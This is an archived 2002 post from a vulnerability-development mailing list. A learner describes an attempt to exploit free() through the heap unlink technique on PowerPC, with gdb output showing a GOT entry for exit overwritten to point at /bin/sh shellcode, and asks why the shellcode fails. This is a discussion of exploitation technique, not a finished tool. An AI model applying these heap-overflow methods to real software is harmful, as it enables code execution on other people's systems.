Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Regex or Progress? Whos fault? - How to exploit free()

From: KF <dotslash () snosoft com>
Date: Mon, 25 Mar 2002 12:20:54 -0500
3APA3A wrote:


Dear KF,

free()  failed because it was heap overflow before free() was called and
memory  chunk  was  overwritten  by  your data ("AAA..."). So the bug is
definitely  NOT  in regexp, but in progress itself, because overflow was
before  destructor  was  ever  called.  This  kind  of  overflows may be
exploitable.
While we are on the subject of free() ... can someone explain to me why a series of jmps need to be placed infront of the shellcode during an attempt to use the "unlink macro" to execute shellcode. Here are my notes from attempting to exploit free() on a powerpc box. Heres a snapshot of the chunk I would use to take advantage of a test program. 
       Starting program: /root/./freeme
       chunk is at 0x100107d8
       Program received signal SIGSEGV, Segmentation fault.
       0xff3ae04 in free () from /lib/libc.so.6
       (gdb) x/10a 0x100107d8
       0x100107d8:     0xfffffff0      0x8     0x41414141      0x42424242
                       <prev_size>     <size>  <fd  or data>   <bk  or data>
       0x100107e8:     0x0     0x0     0x43434340      0x44444444
                                       <return>        <shellcode>
As I understand free() exploitation (I could be wrong as I am learning)... In the areas represented above by 0x41414141 0x42424242 and 0x44444444 I should place the address of my shellcode. In the area noted as 0x43434340 I need to place the adderss of the GOT table entry I want to change minus 12 (on ppc. -4 on intel?). 
[root@ibook root]# objdump -R freeme  | grep exit
100108c0 R_PPC_JMP_SLOT    exit
So when I put all that together and test it with the sample program I come up with the following. (gdb) r 
Starting program: /root/./freeme
chunk is at 0x10010910
shellcode is  at 0x7ffff7e8
address written

Program received signal SIGILL, Illegal instruction.
0x100108c0 in exit ()
(gdb) x/10a 0x100108c0
0x100108c0 <exit>:      0x7ffff7e8      0x4bffffa4      0x4bf2a3e4
0x4bffff9c
0x100108d0 <free+8>:    0x0     0x0     0x0     0x0
0x100108e0 <free+24>:   0x0     0x0
(gdb) x/10s  0x7ffff7e8
0x7ffff7e8:
"8`\00178c?o^\020\001\b?\177A`\036pDy"y"\002|?*x@\202y"i'\177e`\002&;y"\00108\177?o^\220ay"?\220?y"u"8\201y"?;A`\001`\177A`.pDy"y"\002/bin/sh"
As you can see the first address in exit() now points to my shellcode located at 0x7ffff7e8... and my shellcode it definately there. However I just get a SIGILL. I assume this is due to the fact that I need some jmps before my shellcode.... Can someone shed some light on this for me? Also who knows the equivilant of a "short jmp" on ppc hardware. -KF
Previous By Date Next
Previous By Thread Next

Current thread: